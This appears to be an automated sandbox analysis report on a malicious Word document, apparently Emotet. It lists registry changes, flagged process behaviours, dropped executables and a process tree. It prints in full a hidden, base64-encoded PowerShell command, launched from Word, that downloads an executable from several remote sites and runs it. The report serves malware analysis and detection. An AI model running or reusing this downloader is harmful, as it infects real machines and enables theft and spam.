\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar" Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C7A3642F-07F5-4A8F-83B0-63E3DDD9F16A}\1.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE" -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1328 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 1328 WINWORD.EXE 1948 WISPTIS.EXE 1232 WISPTIS.EXE 2104 67.exe 2128 67.exe 2180 speednetsh.exe 2196 speednetsh.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1328 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 820 Powershell.exe 2196 speednetsh.exe -
Executes dropped EXE 4 IoCs
pid Process 2104 67.exe 2128 67.exe 2180 speednetsh.exe 2196 speednetsh.exe -
Suspicious behavior: EmotetMutantsSpam 2 IoCs
pid Process 2128 67.exe 2196 speednetsh.exe -
Drops file in System32 directory 6 IoCs
description ioc Process File created C:\Windows\system32\spool\DRIVERS\x64\3\mxdwdui.BUD WINWORD.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk Powershell.exe File opened for modification C:\Windows\system32\GDIPFONTCACHEV1.DAT WINWORD.EXE File renamed C:\Users\Admin\67.exe => C:\Windows\SysWOW64\speednetsh.exe 67.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat speednetsh.exe File deleted C:\Windows\System32\spool\drivers\x64\3\mxdwdui.BUD WINWORD.EXE
Processes
-
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_fbff465d66a0eb834b052719a27f5ab1.15.doc"1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of FindShellTrayWindow
- Drops file in System32 directory
PID:1328
-
C:\Windows\SYSTEM32\WISPTIS.EXE/QuitInfo:00000000000005F0;0000000000000658;1⤵
- Suspicious use of SetWindowsHookEx
PID:1948
-
C:\Windows\SYSTEM32\WISPTIS.EXE/QuitInfo:00000000000005F0;0000000000000658;1⤵
- Suspicious use of SetWindowsHookEx
PID:1232
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABSAHoAeQBuAGgAcQBnAHcAdAB5AD0AJwBVAHcAZABkAGEAbgBxAG4AaQByAGgAdQAnADsAJABJAHoAdwBzAHIAawBzAGcAdgBkAGMAZwAgAD0AIAAnADYANwAnADsAJABPAGkAZwBiAGcAegB1AGwAPQAnAEQAdwBtAG0AbQBmAHkAegB6AHEAdgBkAHMAJwA7ACQAVQBlAGsAZABuAG4AZABjAGgAdwByAGUAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEkAegB3AHMAcgBrAHMAZwB2AGQAYwBnACsAJwAuAGUAeABlACcAOwAkAFAAYQBhAHoAcgBlAGwAcwBwAHMAbgA9ACcATQB0AHoAbAB2AGYAdwByAGQAYgB2AGwAagAnADsAJABaAHkAagBzAHEAdgB2AHUAYQB2AHoAaQBlAD0ALgAoACcAbgBlAHcALQBvACcAKwAnAGIAagAnACsAJwBlAGMAdAAnACkAIABOAEUAVAAuAHcARQBCAEMATABJAEUAbgBUADsAJABJAGsAYgBhAGUAYwBnAGcAeQA9ACcAaAB0AHQAcAA6AC8ALwBuAGEAbgBnAG4AZwB1AGMAcwBpAGEAbQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHAAbAB1AGcAaQBuAHMALwB3AHAALQBmAGYAcABjAC8ANABpAGoAMwAzAC8AKgBoAHQAdABwADoALwAvAGoAcwBkAC0AaQBkAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdQBwAGwAbwBhAGQAcwAvADQAYQBlADMAZQBwADkAOQA5ADMAMwAvACoAaAB0AHQAcAA6AC8ALwAxADgAdABlAGUAbgBzAC4AeAB5AHoALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AZQBwAGUAdwBlADgANgAyAC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AZgB1AG4AZAB6AGkAdAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AZwAwADUALwAqAGgAdAB0AHAAOgAvAC8AdwBwAC4AYgBhAG4AeQBhAG4AbgBhAHAAbABlAHMALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwA5ADcAcwBxADkANgA2ADcALwAnAC4AIgBTAFAAYABsAGkAVAAiACgAJwAqACcAKQA7ACQAWgBmAGsAcQBkAG4AcgB5AD0AJwBRAHUAcwBlAHgAdQB5AHMAYQBtACcAOwBmAG8AcgBlAGEAYwBoACgAJABaAHIAcwB0AGcAcQByAGUAbQB0ACAAaQBuACAAJABJAGsAYgBhAGUAYwBnAGcAeQApAHsAdAByAHkAewAkAFoAeQBqAHMAcQB2AHYAdQBhAHYAegBpAGUALgAiAEQATwB3AG4AbABgAE8AYABBAEQARgBpAEwAZQAiACgAJABaAHIAcwB0AGcAcQByAGUAbQB0ACwAIAAkAFUAZQBrAGQAbgBuAGQAYwBoAHcAcgBlACkAOwAkAEsAaABtAGcAdwBsAHoAZQBuAGkAagA9ACcASgBoAHgAagBrAHYAdgBmAHoAZgBsAGUAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAdABlACcAKwAnAG0AJwApACAAJABVAGUAawBkAG4AbgBkAGMAaAB3AHIAZQApAC4AIgBsAGUAYABOAEcAVABIACIAIAAtAGcAZQAgADMAMAAwADAAMgApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAHQAYQBgAFIAVAAiACgAJABVAGUAawBkAG4AbgBkAGMAaAB3AHIAZQApADsAJABYAHQAaQBpAHcAagB2AGQAZQA9ACcARgB5AHAAeQBoAGwAagBtAG4AbQBiACcAOwBiAHIAZQBhAGsAOwAkAFEAawBrAGwAYwBhAGIAagBmAHMAaAA9ACcAQQBtAGkAbwBlAHQAbAB1AHEAdwBxAGIAeAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABBAHMAdQB2AGoAcwByAGwAeQBqAGEAZAA9ACcAQQBnAGgAZABpAGsAdwBkAHoAJwA=1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Drops file in System32 directory
PID:820 -
C:\Users\Admin\67.exe"C:\Users\Admin\67.exe"2⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
PID:2104 -
C:\Users\Admin\67.exe--4e61eeeb3⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Suspicious behavior: EmotetMutantsSpam
- Drops file in System32 directory
PID:2128
-
-
-
C:\Windows\SysWOW64\speednetsh.exe"C:\Windows\SysWOW64\speednetsh.exe"1⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
PID:2180 -
C:\Windows\SysWOW64\speednetsh.exe--3f6b399d2⤵
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EnumeratesProcesses
- Executes dropped EXE
- Suspicious behavior: EmotetMutantsSpam
- Drops file in System32 directory
PID:2196
-